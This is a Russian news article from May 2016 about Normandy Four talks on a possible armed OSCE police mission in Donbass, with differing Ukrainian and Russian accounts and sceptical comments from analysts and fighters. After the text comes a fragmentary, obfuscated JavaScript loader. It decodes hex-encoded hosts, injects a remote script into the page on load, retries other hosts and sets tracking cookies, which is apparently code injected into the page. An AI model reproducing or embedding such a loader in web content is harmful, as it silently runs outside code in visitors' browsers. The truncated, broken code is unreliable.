А. Братерский, Д. Кириллов, В. Дергачев, И. Крючков «Гибридная миссия в гибридной войне»

«Гибридная миссия в гибридной войне»

«Нормандская четверка» готовит полицейскую миссию ОБСЕ в Донбассе
Александр Братерский, Дмитрий Кириллов (Донбасс), Владимир Дергачев, Игорь Крючков 24.05.2016, 13:16

 Лидеры «нормандской четверки» провели ночной разговор о ситуации в Донбассе. Киев заявил о договоренности по введению полицейской миссии ОБСЕ в район конфликта, однако Кремль говорит лишь о расширении полномочий уже действующих здесь международных специалистов. Сама ОБСЕ не подтверждает факт принятия решения по Донбассу, тем более что новая миссия вполне может привести к окончательной заморозке конфликта.

Разговор лидеров «четверки» — Владимира Путина, Ангелы Меркель, Петра Порошенко и Франсуа Олланда — состоялся в ночь на 24 мая. Неясно, было ли выбрано такое время из-за напряженного графика глав четырех стран или учитывалась разница во времени с США, где активно следят за ситуацией на Украине.

По итогам телефонного разговора пресс-служба президента Украины заявила, что в Донбассе могут быть развернуты полицейские силы ОБСЕ для контроля режима прекращения огня. Как заявила пресс-служба Порошенко, решение об этом было принято по итогам ночного разговора между лидерами России, Германии, Украины и Франции, входящих в «нормандскую четверку» по урегулированию конфликта на Восточной Украине.

В свою очередь, пресс-служба Кремля сообщила, что стороны договорились только о «повышении эффективности деятельности в зоне конфликта специальной мониторинговой миссии ОБСЕ путем придания ей дополнительных полномочий, а также укрепления совместного центра по контролю и координации».

Официальный представитель ОБСЕ Сауле Мухаметрахимова в разговоре с «Газетой.Ru» не подтвердила, что решение по полицейской миссии принято.

«Идея, которую высказала украинская сторона, высказывалась и ранее. Мы знаем, что ее поддерживает целый ряд политиков, связанных с этим дипломатическим процессом, в том числе представители России, — заявила она. — Однако для того, чтобы это решение было принято ОБСЕ, необходимо провести заседание постоянного совета организации, в котором 57 стран – членов организации должны прийти к консенсусу».

Здравствуй, оружие

Миссия ОБСЕ уже присутствует в зоне конфликта. Это невооруженные сотрудники, которые следят за соблюдением режима прекращения огня между Украиной и самопровозглашенными Донецкой и Луганской народными республиками (ДНР и ЛНР). Для мониторинга ситуации ОБСЕ также использует беспилотники.

Помимо согласия всех 57 стран – членов ОБСЕ для введения международных полицейских сил в Донбасс необходимо также согласие руководства непризнанных республик. Вероятнее всего, это будет решаться на уровне контактной группы. Киев отказывается вести прямой диалог с лидерами ЛНР и ДНР, считая, что они являются лишь марионетками Москвы. Российские власти, в свою очередь, эти обвинения отвергают и призывают Киев к прямым переговорам с самопровозглашенными республиками.

 Присутствие в зоне конфликта вооруженной международной миссии всегда было желанием Киева — для контроля за безопасностью грядущих выборов в ЛНР и ДНР, а также для содействия демилитаризации конфликта. Москва это предложение неоднократно отвергала. Не хотели видеть вооруженную международную полицию у себя и лидеры непризнанных республик.

Согласно минским соглашениям, на территории ДНР и ЛНР должны пройти выборы по украинскому законодательству. Точные даты выборов пока не назначены, однако глава ДНР Александр Захарченко заявил в понедельник, что осенью этого года в республике пройдут праймериз для определения кандидатов. По его словам, сами выборы пройдут в конце текущего или в начале следующего года.

Люди, близкие к Александру Хугу, и.о. главы мониторинговой миссии ОБСЕ на Украине, подтверждают, что сейчас контингент ОБСЕ представляет гражданский персонал. Никакого отношения к полицейской, то есть вооруженной миссии они иметь не будут.

«Создание полицейской миссии — небыстрый процесс. Находясь постоянно здесь, мы понимаем одно: нашим коллегам будет непросто», — утверждает собеседник «Газеты.Ru».

Пока у ОБСЕ нет согласованного мандата на создание вооруженной миссии. И непонятно, как быстро этот мандат могут ей предоставить, говорит директор Центра политической конъюнктуры Алексей Чеснаков.

«Украинский президент сначала настаивал на миротворцах ООН, но постепенно дошел до идеи полицейской миссии ОБСЕ. Порошенко в первую очередь хотел бы разместить полицейские силы организации на границе с Россией. В Москве от этого категорически отказываются. Как и в республиках Донбасса. А поскольку для мандата ОБСЕ потребуется согласие России, то это выглядит нереалистично», — рассуждает эксперт.

По его словам, Россия может согласиться на размещение полицейской миссии на линии соприкосновения — для гарантии обоюдного прекращения огня. Но тут возникают вопросы у самой ОБСЕ.

Поскольку ни Киев, ни самопровозглашенные республики не могут гарантировать безопасности сотрудников данной миссии, ответственность за возможную гибель сотрудников миссии будет нести сама ОБСЕ.

Кроме того, специально подготовленного контингента и опыта для подобной миссии у организации нет. Она занимается мониторингом, а не миротворческой деятельностью.

«В 1990-е годы ОБСЕ очень плотно работала над урегулированием международных конфликтов, у нее было достаточно специалистов, которые могли бы справиться в ситуации, подобной нынешнему Донбассу, — рассказал «Газете.Ru» российский дипломатический источник. — Сегодня, судя по моим контактам в ОБСЕ, организация сама понимает, что растеряла тогдашний опыт. Прежних профессионалов у нее практически не осталось».

«У нас нет большого доверия к ОБСЕ»

«В любом случае это путь к замораживанию конфликта, поскольку после размещения полицейской миссии на линии соприкосновения большинство контактов между двумя территориями оборвутся или примут жестко регламентированный характер», — подытожил Чеснаков.

Украинский политолог Константин Батозский считает, что полицейская миссия ничего не изменит в Донбассе, поскольку ее мандат не распространяется на остановку военных действий.

«Ее вооружения и оснащения недостаточно, чтобы остановить артиллерийскую дуэль, а здесь это основной вид боевых действий. С моей точки зрения, разговоры о полицейской миссии ОБСЕ со стороны Украины — это способ перехватить инициативу на минских переговорах и отдалить выборы как неприемлемый на данный момент сценарий для страны, — рассказал эксперт «Газете.Ru». — Я не верю в прорыв хотя бы потому, что полицейские как таковые не могут реально остановить насилие. Насилие останавливают воинские контингенты. А это не про ОБСЕ».

Представить себе полицейскую миссию ОБСЕ с легким стрелковым вооружением и бронетехникой в ДНР и ЛНР можно только с большим трудом. Скептически относятся к миссии с обеих сторон конфликта на востоке Украины. Один из собеседников «Газеты.Ru» в ополчении не понимает, зачем миссии оружие: будут ли они стрелять и иметь санкцию на арест?

«В Донецке сейчас порядок. Вооруженных людей на улицах нет. Но это не значит, что бойцы, выполняющие приказ, вдруг дадут себя задерживать каким-то европейцам. Здесь тысячи людей полегло, и к войне и смерти у местного человека с оружием отношение попроще, чем в Европе, — рассуждает ополченец. — Захарченко сказал, что любых чужих вооруженных будем воспринимать как интервентов. Не думаю, что что-то поменялось. Во всяком случае пока никаких других приказов или разговоров нет».

В полицейской миссии ОБСЕ есть свои плюсы, но она не решит вопрос Донбасса, считает замкомандира отдельного 131-го разведывательного батальона ВС Украины Игорь Мазур.

«У нас нет большого доверия к ОБСЕ. Есть еще вопрос, сколько там в составе будет вооруженных россиян, например. Она была бы эффективной только в одном случае: если контроль за государственной границей перейдет к украинским пограничникам, а внутри этих территорий будет оперировать полицейская миссия ОБСЕ и обеспечивать мирный переходный период», — считает собеседник «Газеты.Ru».

«В нынешней ситуации ОБСЕ будет договариваться и с нами, и с боевиками и действовать будет так же — «и нашим и вашим». Ее роль будет очевидно гибридной. Гибридная миссия в гибридной войне», — добавил Мазур. 

<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>